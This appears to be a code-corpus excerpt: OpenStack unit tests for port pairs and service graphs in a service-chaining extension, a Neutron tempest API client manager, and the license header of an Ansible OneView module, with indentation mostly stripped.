def test_create_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
})
def test_quota_create_port_pair_quota(self):
cfg.CONF.set_override('quota_port_pair', 3, group='QUOTAS')
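        # The quota above allows three port pairs, so the first three creates
        # should succeed (201) and the fourth should be rejected (409).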
with self.port(
name='port1',
device_id='default'
) as src_port1, self.port(
name='port2',
device_id='default'
) as dst_port1, self.port(
name='port3',
device_id='default'
) as src_port2, self.port(
name='port4',
device_id='default'
) as dst_port2, self.port(
name='port5',
device_id='default'
) as src_port3, self.port(
name='port6',
device_id='default'
) as dst_port3, self.port(
name='port7',
device_id='default'
) as src_port4, self.port(
name='port8',
device_id='default'
) as dst_port4:
self._create_port_pair(
self.fmt, {
'ingress': src_port1['port']['id'],
'egress': dst_port1['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port2['port']['id'],
'egress': dst_port2['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port3['port']['id'],
'egress': dst_port3['port']['id']
}, expected_res_status=201)
self._create_port_pair(
self.fmt, {
'ingress': src_port4['port']['id'],
'egress': dst_port4['port']['id']
}, expected_res_status=409)
def test_create_port_pair_all_fields(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {
'correlation': None, 'weight': 2}
})
def test_create_port_pair_none_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': None
})
def test_create_port_pair_empty_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
self._test_create_port_pair({
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id'],
'service_function_parameters': {}
})
def test_create_port_pair_with_src_dst_same_port(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._test_create_port_pair({
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id']
})
def test_create_port_pair_empty_input(self):
self._create_port_pair(self.fmt, {}, expected_res_status=400)
def test_create_port_pair_with_no_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_no_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_nouuid_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': '1',
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_unknown_ingress(self):
with self.port(
name='port1',
device_id='default'
) as dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': uuidutils.generate_uuid(),
'egress': dst_port['port']['id']
},
expected_res_status=404
)
def test_create_port_pair_with_nouuid_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': '1'
},
expected_res_status=400
)
def test_create_port_pair_with_unknown_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': uuidutils.generate_uuid()
},
expected_res_status=404
)
def test_create_port_pair_ingress_egress_different_hosts(self):
with self.port(
name='port1',
device_id='device1'
) as src_port, self.port(
name='port2',
device_id='device2'
) as dst_port:
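            # ingress and egress ports are bound to different devices, so the
            # pair should be rejected with a 400 response.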
self._create_port_pair(
self.fmt,
{
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'abc': 'def'}
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_correlation(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'correlation': 'def'}
},
expected_res_status=400
)
def test_create_port_pair_with_invalid_weight(self):
with self.port(
name='port1',
device_id='default'
) as src_dst_port:
self._create_port_pair(
self.fmt,
{
'ingress': src_dst_port['port']['id'],
'egress': src_dst_port['port']['id'],
'service_function_parameters': {'weight': -1}
},
expected_res_status=400
)
def test_list_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
port_pairs = [pc1, pc2]
self._test_list_resources(
'port_pair', port_pairs
)
def test_list_port_pairs_with_params(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'name': 'test2',
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
self._test_list_resources(
'port_pair', [pc1],
query_params='name=test1'
)
self._test_list_resources(
'port_pair', [pc2],
query_params='name=test2'
)
self._test_list_resources(
'port_pair', [],
query_params='name=test3'
)
def test_list_port_pairs_with_unknown_params(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc1, self.port_pair(port_pair={
'name': 'test2',
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pc2:
port_pairs = [pc1, pc2]
self._test_list_resources(
'port_pair', port_pairs,
query_params='hello=test3'
)
def test_show_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in pc['port_pair'].items():
self.assertEqual(res['port_pair'][k], v)
def test_show_port_pair_noexist(self):
req = self.new_show_request(
'port_pairs', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_update_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'name': 'test2',
'description': 'desc2'
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = pc['port_pair']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['port_pair'][k], v)
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['port_pair'][k], v)
def test_update_port_pair_service_function_parameters(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'service_function_parameters': {
'correlation': None, 'weight': 2,
}
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_pair_ingress(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'ingress': dst_port['port']['id']
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_update_port_pair_egress(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'name': 'test1',
'description': 'desc1',
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pc:
updates = {
'egress': src_port['port']['id']
}
req = self.new_update_request(
'port_pairs', {'port_pair': updates},
pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(400, res.status_int)
def test_delete_port_pair(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}, do_delete=False) as pc:
req = self.new_delete_request(
'port_pairs', pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'port_pairs', pc['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_noexist(self):
req = self.new_delete_request(
'port_pairs', '1'
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
def test_delete_port_pair_port_pair_group_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp:
with self.port_pair_group(port_pair_group={
'port_pairs': [pp['port_pair']['id']]
}):
req = self.new_delete_request(
'port_pairs', pp['port_pair']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(409, res.status_int)
def test_delete_ingress_port_pair_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}):
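                # Deleting a port that is still used as a port pair's ingress
                # is expected to fail; the API currently surfaces this as 500.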
req = self.new_delete_request(
'ports', src_port['port']['id']
)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
def test_delete_egress_port_pair_exist(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}):
req = self.new_delete_request(
'ports', dst_port['port']['id']
)
res = req.get_response(self.api)
self.assertEqual(500, res.status_int)
def _test_create_service_graph_branching_ppg(
self, src_corr, dst_corr, status):
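        # Helper: creates two port chains (pg1->pg2 and pg3->pg4), then links
        # pc1 to pc2 in a service graph; src_corr applies to the port pair at
        # the end of pc1 and dst_corr to the one at the start of pc2, and
        # `status` is the expected HTTP status of the graph creation.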
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2, self.port(
name='port3',
device_id='default'
) as port3, self.port(
name='port4',
device_id='default'
) as port4:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}, do_delete=False) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': src_corr}
}, do_delete=False) as pp2, self.port_pair(port_pair={
'ingress': port3['port']['id'],
'egress': port3['port']['id'],
'service_function_parameters': {'correlation': dst_corr}
}, do_delete=False) as pp3, self.port_pair(port_pair={
'ingress': port4['port']['id'],
'egress': port4['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}, do_delete=False) as pp4:
with self.port_pair_group(
port_pair_group={'port_pairs': [pp1['port_pair']['id']]},
do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={'port_pairs': [pp2['port_pair']['id']]},
do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={'port_pairs': [pp3['port_pair']['id']]},
do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={'port_pairs': [pp4['port_pair']['id']]},
do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [
pg3['port_pair_group']['id'],
pg4['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=status)
def test_create_service_graph_branching_ppg_no_src_corr_fail(self):
self._test_create_service_graph_branching_ppg(None, 'mpls', 400)
def test_create_service_graph_branching_ppg_no_dst_corr_fail(self):
self._test_create_service_graph_branching_ppg('mpls', None, 400)
def test_create_service_graph_branching_ppg_both_corrs_ok(self):
self._test_create_service_graph_branching_ppg('mpls', 'mpls', 201)
def test_create_service_graph_linear_dependency_only(self):
        # this test will create a graph consisting of one port chain that
        # depends on one other port chain, i.e. with no branching.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_create_service_graph_branching_no_class(self):
# this test will create a graph where 1 port chain will act
# as a dependency to 2 other port chains, effectively
# creating a branching service function chain.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc3['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_create_service_graph_same_chain_fail(self):
# this test will attempt to create a graph with a single branching
# point having 2 port chains - which are actually the same port chain.
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
}
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]
}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc2['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_already_used_pcs_fail(self):
# this test will attempt to create a graph that maps
# port-chains which have already been mapped to other graphs.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
self._create_service_graph(self.fmt, {
'port_chains': {
pc3['port_chain']['id']: [
pc1['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=409)
def test_create_service_graph_with_multiple_starts(self):
# this test will create a graph with multiple starting chains (tails)
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc3['port_chain']['id']: [pc4['port_chain']['id']],
pc4['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def _test_create_service_graph_single_branching_two_fcs_each(
self, fc1_dict, fc2_dict, fc3_dict, fc4_dict, expected_res_status
):
with self.flow_classifier(
flow_classifier=fc1_dict, do_delete=False
) as fc1, self.flow_classifier(
flow_classifier=fc2_dict, do_delete=False
) as fc2, self.flow_classifier(
flow_classifier=fc3_dict, do_delete=False
) as fc3, self.flow_classifier(
flow_classifier=fc4_dict, do_delete=False
) as fc4:
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]
},
do_delete=False
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']],
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
]
},
do_delete=False
) as pc2, self.port_chain(
port_chain={
'port_pair_groups': [pg3['port_pair_group']['id']],
'flow_classifiers': [
fc3['flow_classifier']['id'],
fc4['flow_classifier']['id']
]
},
do_delete=False
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [
pc2['port_chain']['id'],
pc3['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=expected_res_status)
def test_create_service_graph_unambiguous_branch(self):
        # this test will create a graph where 1 port chain will act
        # as a dependency to 2 other port chains, using different
        # classifications for the dependent chains, so creation must succeed.
with self.port(
name='test1', do_delete=False
) as port1, self.port(
name='test2', do_delete=False
) as port2, self.port(
name='test3', do_delete=False
) as port3, self.port(
name='test4', do_delete=False
) as port4:
fc1_dict = {
'name': 'fc1',
'ethertype': 'IPv4',
'protocol': 'tcp',
'logical_source_port': port1['port']['id']
}
fc2_dict = {
'name': 'fc2',
'ethertype': 'IPv6',
'protocol': 'tcp',
'logical_source_port': port2['port']['id']
}
fc3_dict = {
'name': 'fc3',
'ethertype': 'IPv4',
'protocol': 'udp',
'logical_source_port': port3['port']['id']
}
fc4_dict = {
'name': 'fc4',
'ethertype': 'IPv6',
'protocol': 'udp',
'logical_source_port': port4['port']['id']
}
self._test_create_service_graph_single_branching_two_fcs_each(
fc1_dict, fc2_dict, fc3_dict, fc4_dict,
expected_res_status=201)
def test_create_service_graph_with_direct_loop_fail(self):
# this test will attempt to create a graph where there is a direct
# loop, i.e. a chain linked to itself - specifically pc2->pc2.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [pc2['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_indirect_loop_fail(self):
# this test will attempt to create a graph where there is an indirect
# loop, i.e. a chain is linked to a chain providing a path back to
# the first chain again - specifically pc2->pc3->pc4->pc2.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg5:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg5['port_pair_group']['id']]}
) as pc5:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [pc3['port_chain']['id']],
pc3['port_chain']['id']: [pc4['port_chain']['id']],
pc4['port_chain']['id']: [
pc2['port_chain']['id'],
pc5['port_chain']['id']
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=400)
def test_create_service_graph_with_inexistent_port_chains(self):
        # this test will attempt to create a graph where one
        # of the referenced port chains does not exist, and fail.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [
pc3['port_chain']['id'],
uuidutils.generate_uuid()
]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=404)
def test_create_service_graph_with_joining_branches(self):
        # this test will create a graph that includes "joining" branches, i.e.
# a set of at least 2 branches that will be linked to the same next
# port chain, thus joining traffic at that point.
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
with self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg3['port_pair_group']['id']]}
) as pc3, self.port_chain(
do_delete=False,
port_chain={'port_pair_groups': [pg4['port_pair_group']['id']]}
) as pc4:
self._create_service_graph(self.fmt, {
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']],
pc2['port_chain']['id']: [
pc3['port_chain']['id'], pc4['port_chain']['id']
],
pc3['port_chain']['id']: [pc4['port_chain']['id']]
},
'name': 'abc',
'description': 'def'
}, expected_res_status=201)
def test_update_service_graph(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={'port_pair_groups': [pg1['port_pair_group']['id']]}
) as pc1, self.port_chain(
port_chain={'port_pair_groups': [pg2['port_pair_group']['id']]}
) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
}
}) as graph:
updates = {
'name': 'test2',
'description': 'desc2'
}
req = self.new_update_request(
'service_graphs', {'service_graph': updates},
graph['service_graph']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
expected = graph['service_graph']
expected.update(updates)
for k, v in expected.items():
self.assertEqual(res['service_graph'][k], v)
req = self.new_show_request(
'service_graphs', graph['service_graph']['id']
)
res = self.deserialize(
self.fmt, req.get_response(self.ext_api)
)
for k, v in expected.items():
self.assertEqual(res['service_graph'][k], v)
def test_delete_service_graph(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'port_pair_groups': [pg1['port_pair_group']['id']]},
) as pc1, self.port_chain(
port_chain={
'port_pair_groups': [pg2['port_pair_group']['id']]},
) as pc2:
with self.service_graph(service_graph={
'name': 'test1',
'port_chains': {
pc1['port_chain']['id']: [pc2['port_chain']['id']]
}
}, do_delete=False) as graph:
req = self.new_delete_request(
'service_graphs', graph['service_graph']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
req = self.new_show_request(
'service_graphs', graph['service_graph']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(404, res.status_int)
req = self.new_show_request(
'port_chains', pc1['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
req = self.new_show_request(
'port_chains', pc2['port_chain']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(200, res.status_int)
|
bgxavier/neutron | refs/heads/master | neutron/tests/api/clients.py | 35 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.tests.tempest.common import cred_provider
from neutron.tests.tempest import config
from neutron.tests.tempest import manager
from neutron.tests.tempest.services.identity.v2.json.identity_client import \
IdentityClientJSON
from neutron.tests.tempest.services.identity.v2.json.token_client import \
TokenClientJSON
from neutron.tests.tempest.services.identity.v3.json.credentials_client \
import CredentialsClientJSON
from neutron.tests.tempest.services.identity.v3.json.endpoints_client import \
EndPointClientJSON
from neutron.tests.tempest.services.identity.v3.json.identity_client import \
IdentityV3ClientJSON
from neutron.tests.tempest.services.identity.v3.json.policy_client import \
PolicyClientJSON
from neutron.tests.tempest.services.identity.v3.json.region_client import \
RegionClientJSON
from neutron.tests.tempest.services.identity.v3.json.service_client import \
ServiceClientJSON
from neutron.tests.tempest.services.identity.v3.json.token_client import \
V3TokenClientJSON
from neutron.tests.tempest.services.network.json.network_client import \
NetworkClientJSON
CONF = config.CONF
LOG = logging.getLogger(__name__)
class Manager(manager.Manager):
"""
Top level manager for OpenStack tempest clients
"""
default_params = {
'disable_ssl_certificate_validation':
CONF.identity.disable_ssl_certificate_validation,
'ca_certs': CONF.identity.ca_certificates_file,
'trace_requests': CONF.debug.trace_requests
}
# NOTE: Tempest uses timeout values of compute API if project specific
# timeout values don't exist.
default_params_with_timeout_values = {
'build_interval': CONF.compute.build_interval,
'build_timeout': CONF.compute.build_timeout
}
default_params_with_timeout_values.update(default_params)
def __init__(self, credentials=None, service=None):
super(Manager, self).__init__(credentials=credentials)
self._set_identity_clients()
self.network_client = NetworkClientJSON(
self.auth_provider,
CONF.network.catalog_type,
CONF.network.region or CONF.identity.region,
endpoint_type=CONF.network.endpoint_type,
build_interval=CONF.network.build_interval,
build_timeout=CONF.network.build_timeout,
**self.default_params)
def _set_identity_clients(self):
params = {
'service': CONF.identity.catalog_type,
'region': CONF.identity.region,
'endpoint_type': 'adminURL'
}
params.update(self.default_params_with_timeout_values)
self.identity_client = IdentityClientJSON(self.auth_provider,
**params)
self.identity_v3_client = IdentityV3ClientJSON(self.auth_provider,
**params)
self.endpoints_client = EndPointClientJSON(self.auth_provider,
**params)
self.service_client = ServiceClientJSON(self.auth_provider, **params)
self.policy_client = PolicyClientJSON(self.auth_provider, **params)
self.region_client = RegionClientJSON(self.auth_provider, **params)
self.credentials_client = CredentialsClientJSON(self.auth_provider,
**params)
# Token clients do not use the catalog. They only need default_params.
self.token_client = TokenClientJSON(CONF.identity.uri,
**self.default_params)
if CONF.identity_feature_enabled.api_v3:
self.token_v3_client = V3TokenClientJSON(CONF.identity.uri_v3,
**self.default_params)
class AdminManager(Manager):
"""
Manager object that uses the admin credentials for its
managed client objects
"""
def __init__(self, service=None):
super(AdminManager, self).__init__(
credentials=cred_provider.get_configured_credentials(
'identity_admin'),
service=service)
|
e-gob/plataforma-kioscos-autoatencion | refs/heads/master | scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/remote_management/oneview/oneview_fcoe_network.py | 147 | #!/usr/bin/python
# Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
